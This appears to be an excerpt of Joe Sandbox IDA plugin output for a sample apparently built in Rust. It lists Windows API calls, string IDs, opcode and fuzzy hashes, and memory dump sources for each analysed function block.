                                            • Instruction ID: e2587a00af077cb21df443a8cd5ea5728c8fc4eb3f9d9814a27bf841309473ad
                                            • Opcode Fuzzy Hash: b84400ee7e79c55e95b58c046b33fc67579e9979e9ec7a4a9ffbca3d45e0d5bb
                                            • Instruction Fuzzy Hash: 1C816B22E09B9689EB109F69D9403AD7370FB2A798F404631EF2C57B8DDF78D4518360
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CloseHandle$FileSleep$ErrorLastReadWrite
                                            • String ID:
                                            • API String ID: 4082512061-0
                                            • Opcode ID: 0d8f85834ed94a0328527500f3fbf17a6b9c570b74d9ee048fd7e452b0836797
                                            • Instruction ID: 528094167b655d22be42765f9172fc07b6076cc957c83ab2f2a886185c094d27
                                            • Opcode Fuzzy Hash: 0d8f85834ed94a0328527500f3fbf17a6b9c570b74d9ee048fd7e452b0836797
                                            • Instruction Fuzzy Hash: 47518222604AD395E731AF29A8017F973B4FB56398F844235EE6C4AB9CDE78D285D310
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B904BCEE,?,?,?,00007FF7B904B9E0,?,?,?,00007FF7B9049F79), ref: 00007FF7B904BAC1
                                            • GetLastError.KERNEL32(?,?,?,00007FF7B904BCEE,?,?,?,00007FF7B904B9E0,?,?,?,00007FF7B9049F79), ref: 00007FF7B904BACF
                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B904BCEE,?,?,?,00007FF7B904B9E0,?,?,?,00007FF7B9049F79), ref: 00007FF7B904BAF9
                                            • FreeLibrary.KERNEL32(?,?,?,00007FF7B904BCEE,?,?,?,00007FF7B904B9E0,?,?,?,00007FF7B9049F79), ref: 00007FF7B904BB67
                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7B904BCEE,?,?,?,00007FF7B904B9E0,?,?,?,00007FF7B9049F79), ref: 00007FF7B904BB73
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 04c847d430a8b357cbdcd349c4e5867dc99fbc92d9ffa70d1cdd1b41aff0efb5
                                            • Instruction ID: 300edeb5fb4833b6bddef57a234ead7fd454d5d849b9d894dc8367211c017cae
                                            • Opcode Fuzzy Hash: 04c847d430a8b357cbdcd349c4e5867dc99fbc92d9ffa70d1cdd1b41aff0efb5
                                            • Instruction Fuzzy Hash: 6231C72171A64391EE51AF1A944057DA3B4BF67BA0F890534EE7D4735CEE7CE4408660
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: Handle$CloseConsoleErrorLastMode
                                            • String ID: called `Result::unwrap()` on an `Err` value
                                            • API String ID: 1170577072-2333694755
                                            • Opcode ID: 81e5c3a94e51ffe971110ae7c630a86fd0ffae82760944cc50fcb365f4217783
                                            • Instruction ID: 9446b8d200e3e6d7c7ddfa4101c96b831f3a05375c91a7c3778022154c6fa201
                                            • Opcode Fuzzy Hash: 81e5c3a94e51ffe971110ae7c630a86fd0ffae82760944cc50fcb365f4217783
                                            • Instruction Fuzzy Hash: 4D81B462A1868395FB11AF78A9403FCA771AB2A798F804135DF6D1369DDF3CD1858360
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslatorabort
                                            • String ID: MOC$RCC
                                            • API String ID: 292945357-2084237596
                                            • Opcode ID: c2d086761dc6fd18626da9231b532bc478a06c8ba32be5aa6bc7485a53e977e9
                                            • Instruction ID: b9e30c2bca7c246e99a56e6f3ef893e292623bbf8301bf06080033df43295eca
                                            • Opcode Fuzzy Hash: c2d086761dc6fd18626da9231b532bc478a06c8ba32be5aa6bc7485a53e977e9
                                            • Instruction Fuzzy Hash: 9B618632908BC685DB609F1AE4407AAB7B0FB96B94F444235EBAD07B59CF7CD194CB10
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_recordabort
                                            • String ID: csm$csm
                                            • API String ID: 4198837600-3733052814
                                            • Opcode ID: f8d6e8cedad6a77bb2c0396b1c190e5ae66afbc715b34cc6c0c9cebf76f4a201
                                            • Instruction ID: 6083af58740487d0c91130e0166e7df05c3df01b1c58cc9cc3ecf2ee00fd3ac1
                                            • Opcode Fuzzy Hash: f8d6e8cedad6a77bb2c0396b1c190e5ae66afbc715b34cc6c0c9cebf76f4a201
                                            • Instruction Fuzzy Hash: 5B517E3290868386EB74AE2A944426CB7B4EB66B85F944135DBAC47B99CF3CE450C710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FullNamePath
                                            • String ID:
                                            • API String ID: 2482867836-0
                                            • Opcode ID: ba76eefd639af96dec1f28aa9424d795c10072416cba78c9c45828c53f0cbe8d
                                            • Instruction ID: 8350981c3bbb0de78054f9b4ff1069f959033cd7d2a5ae4e9ab1acedf2fdd79c
                                            • Opcode Fuzzy Hash: ba76eefd639af96dec1f28aa9424d795c10072416cba78c9c45828c53f0cbe8d
                                            • Instruction Fuzzy Hash: 00B1A362A087C38AEB25AF29D9447E8A279FB16BD4F944131DF2C5B799DF38D2418310
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FullNamePath
                                            • String ID:
                                            • API String ID: 2482867836-0
                                            • Opcode ID: 3312637ff695d0fd956b92b6b936942761c90b43967c05ecb60f82c5b0f61ac3
                                            • Instruction ID: e40f083ad9959e52dc87d07a02d03233c6c51cedeeb1ce74ddb193bfc55da0a3
                                            • Opcode Fuzzy Hash: 3312637ff695d0fd956b92b6b936942761c90b43967c05ecb60f82c5b0f61ac3
                                            • Instruction Fuzzy Hash: 53B1B462A08BC389EB35AF29D9443E9A279FB16BD4F944131DF6C5B789DF38D2418310
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$EnvironmentVariable
                                            • String ID:
                                            • API String ID: 2691138088-0
                                            • Opcode ID: 40a8af77cb83e711465423b7e4295d1b533cfbe4621878e8606779f8fa624747
                                            • Instruction ID: a660ef722859da905a377fb276f83d932014a72c1e7dc0d18bd4bc1074bdca24
                                            • Opcode Fuzzy Hash: 40a8af77cb83e711465423b7e4295d1b533cfbe4621878e8606779f8fa624747
                                            • Instruction Fuzzy Hash: 5781B162A04AD389EB31AF29D8443E9B375FF26798F904135DF6C5B689DF38D2818314
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1956605914-0
                                            • Opcode ID: 9b792ba087b754caaed6a68868abe4804498491c3c59dfb27f505c1cfb20efb0
                                            • Instruction ID: ad1d1476194dbd2d1459b7951065dfd22c8f2ace4faf5fa60742bf4830d07081
                                            • Opcode Fuzzy Hash: 9b792ba087b754caaed6a68868abe4804498491c3c59dfb27f505c1cfb20efb0
                                            • Instruction Fuzzy Hash: F951D221A0C69395E720AF28E9443F9A2B1FB6A794F844131DB6D47AECDF3CD5818260
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FileModuleName
                                            • String ID:
                                            • API String ID: 1026760046-0
                                            • Opcode ID: f01fb9a2bc57b3d2b1039f647bb717d38f054ee20f4b73a6f2b0038690f7b895
                                            • Instruction ID: 08642594511f9229c950bd743654e8b493b2dd70b05e696a606e71a06ddf0796
                                            • Opcode Fuzzy Hash: f01fb9a2bc57b3d2b1039f647bb717d38f054ee20f4b73a6f2b0038690f7b895
                                            • Instruction Fuzzy Hash: 5F51F762A047C255E771AF29AC443E9B379BB26BE4FA04135DF2C56789DE38D2818310
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CurrentDirectory
                                            • String ID:
                                            • API String ID: 3993060814-0
                                            • Opcode ID: a71a4c22c91586a61734b4bf9cdfccbd620d121b6fd3e40877aba937771e1c0d
                                            • Instruction ID: a3aaf79cd3f3add9303a6b6f494fd6be4f22c989fd65d957433336e2cca3c593
                                            • Opcode Fuzzy Hash: a71a4c22c91586a61734b4bf9cdfccbd620d121b6fd3e40877aba937771e1c0d
                                            • Instruction Fuzzy Hash: 5F51C622A047C259E771AF29AC443E9B378BB66BE4F804135DF6D5678DDE3CE2818310
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorHandleLast$CurrentDuplicateProcess
                                            • String ID:
                                            • API String ID: 3697983210-0
                                            • Opcode ID: a84996ec7724e0f27e3750ae2423f6fd2eb7d8270aa4a0a9ba7a348fda5a6813
                                            • Instruction ID: 32cbfd78f36a897471962a98364b638bd9488602df0db523e7752b25a3101655
                                            • Opcode Fuzzy Hash: a84996ec7724e0f27e3750ae2423f6fd2eb7d8270aa4a0a9ba7a348fda5a6813
                                            • Instruction Fuzzy Hash: 59114F71A0C74396FB206F69A445379A271FB5A7A8F904234DA7D066CCDF7DE4449220
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AddressSingleWake
                                            • String ID: <unnamed>$Box<dyn Any>aborting due to panic at $main
                                            • API String ID: 3114109732-896199136
                                            • Opcode ID: 0026388bcf7ca5048021ae864d0e4a43bbb5f126b99ceda82b88653c6e9fc59c
                                            • Instruction ID: 7418cf91703849786189fe9bc4deb17ade6b6ae1a960a9dac50cdb16112d4be1
                                            • Opcode Fuzzy Hash: 0026388bcf7ca5048021ae864d0e4a43bbb5f126b99ceda82b88653c6e9fc59c
                                            • Instruction Fuzzy Hash: 0ED19122A08A5385EB51AF29D4403FDB7B0EB26B88F844476DB6D47798CF3DE485C360
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: 1073ff76e281692413ab2b7aa27f58aec6c4a35b0489a6cc94ddb9ff7625e67e
                                            • Instruction ID: 4d3a8d9c83f5cc06a3d29a91143fd9911b9628bea984415c051950abb60e1fdf
                                            • Opcode Fuzzy Hash: 1073ff76e281692413ab2b7aa27f58aec6c4a35b0489a6cc94ddb9ff7625e67e
                                            • Instruction Fuzzy Hash: FB519031A19A038ADB14AE1AE084A79B3B1EB65F88F914134DB794378EDF3DE841C710
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: terminate
                                            • String ID: MOC$RCC$csm
                                            • API String ID: 1821763600-2671469338
                                            • Opcode ID: 7452083ed9cb36d213407fe42873fc44bc2a82579146da1c61ef2b8bef4380e9
                                            • Instruction ID: 3ef373fa5129bf488ef9b3114d7452c33d8e80c450370d057d87253d721ce400
                                            • Opcode Fuzzy Hash: 7452083ed9cb36d213407fe42873fc44bc2a82579146da1c61ef2b8bef4380e9
                                            • Instruction Fuzzy Hash: C8F0AF36908647C6E7647F1B918106CB274EFAA740F8A9131D76C077AACF7CE490E661
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: SetThreadDescription$kernel32
                                            • API String ID: 1646373207-1950310818
                                            • Opcode ID: 413311be91697036f5db5f8af35ed6315efe56a155240f357945624ab3dea04c
                                            • Instruction ID: 01b476c1fec3aeb4f49eb903fee9bbe656587dfe175d71f077addf7130e2f1d0
                                            • Opcode Fuzzy Hash: 413311be91697036f5db5f8af35ed6315efe56a155240f357945624ab3dea04c
                                            • Instruction Fuzzy Hash: 0EF05B15B0D743E1FA15AF49A9881B4B3B4AF2ABD0FC44035CA7D227589E2CE545D220
                                            APIs
                                            • CancelIo.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7B901F97D,?,?,00000000,00000000,?), ref: 00007FF7B9031488
                                            • GetOverlappedResult.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7B901F97D,?,?,00000000,00000000,?), ref: 00007FF7B90314AA
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7B901F97D,?,?,00000000,00000000,?), ref: 00007FF7B90314BC
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7B901F97D,?,?,00000000,00000000,?), ref: 00007FF7B9031528
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CancelOverlappedResult
                                            • String ID:
                                            • API String ID: 3836860830-0
                                            • Opcode ID: a884bd1a06d4c2eb8e9cbb3695207d8384306ba8dfc3dcae3472e3a9cd46b628
                                            • Instruction ID: 1aa3c724db5d31050c07515e9a640dbf8c06d27ca8eb29fe72c153114c789a35
                                            • Opcode Fuzzy Hash: a884bd1a06d4c2eb8e9cbb3695207d8384306ba8dfc3dcae3472e3a9cd46b628
                                            • Instruction Fuzzy Hash: AD419F32A18A4285EB50AF69D9403AD67B0FBA9794F548631DF6E43BC8DF38D580C320
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$DirectorySystem
                                            • String ID:
                                            • API String ID: 860285823-0
                                            • Opcode ID: eb39d9dc3ab494b94e2d1b0ffc44216c63ff8d20ddcc7591486e24af19e69c66
                                            • Instruction ID: 2b308614af54199e16c73419b11a61f9dc73978b85ef36c594e0b3c4a5929d1a
                                            • Opcode Fuzzy Hash: eb39d9dc3ab494b94e2d1b0ffc44216c63ff8d20ddcc7591486e24af19e69c66
                                            • Instruction Fuzzy Hash: EA41B721A18AA245E7746F3D8D443BAA2A1BB2AB55F904135DA6D8BBCCDF28D540D310
                                            APIs
                                            • CreateEventW.KERNEL32(?,?,?,00000000,?,?,?,00007FF7B9030D5D), ref: 00007FF7B9031100
                                            • GetLastError.KERNEL32(?,?,?,00000000,?,?,?,00007FF7B9030D5D), ref: 00007FF7B903115D
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,00007FF7B9030D5D), ref: 00007FF7B90311CE
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,00007FF7B9030D5D), ref: 00007FF7B90311D4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CloseHandle$CreateErrorEventLast
                                            • String ID:
                                            • API String ID: 3743700123-0
                                            • Opcode ID: 19626a39ad0d5ba7b181dd2f40a95146c2c1a4e072f003b6bbab82c629dff18b
                                            • Instruction ID: fbc5449187483782485d9aea1b8abc836e21755bb2ffe3f81cbdf3eeee26f2ca
                                            • Opcode Fuzzy Hash: 19626a39ad0d5ba7b181dd2f40a95146c2c1a4e072f003b6bbab82c629dff18b
                                            • Instruction Fuzzy Hash: FC21D233A04B0286F7215F26B8403A9A674FB9A7A0F588234DFAD137D4EE3CD4D28310
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 43b5c4cba9f747e9d25ac04b51d92f885defc1a8dfb37f1489eaa0b42e208026
                                            • Instruction ID: 03514467bb64bed0a7110e4736e2f4782a63e83c810634e9b92db913475c0d79
                                            • Opcode Fuzzy Hash: 43b5c4cba9f747e9d25ac04b51d92f885defc1a8dfb37f1489eaa0b42e208026
                                            • Instruction Fuzzy Hash: 90111F22B14B0289EB40AF64E8542B873B4F72A758F440E35DB6D86798DF78D5548350
                                            APIs
                                            Strings
                                            • use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF7B904E8BC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
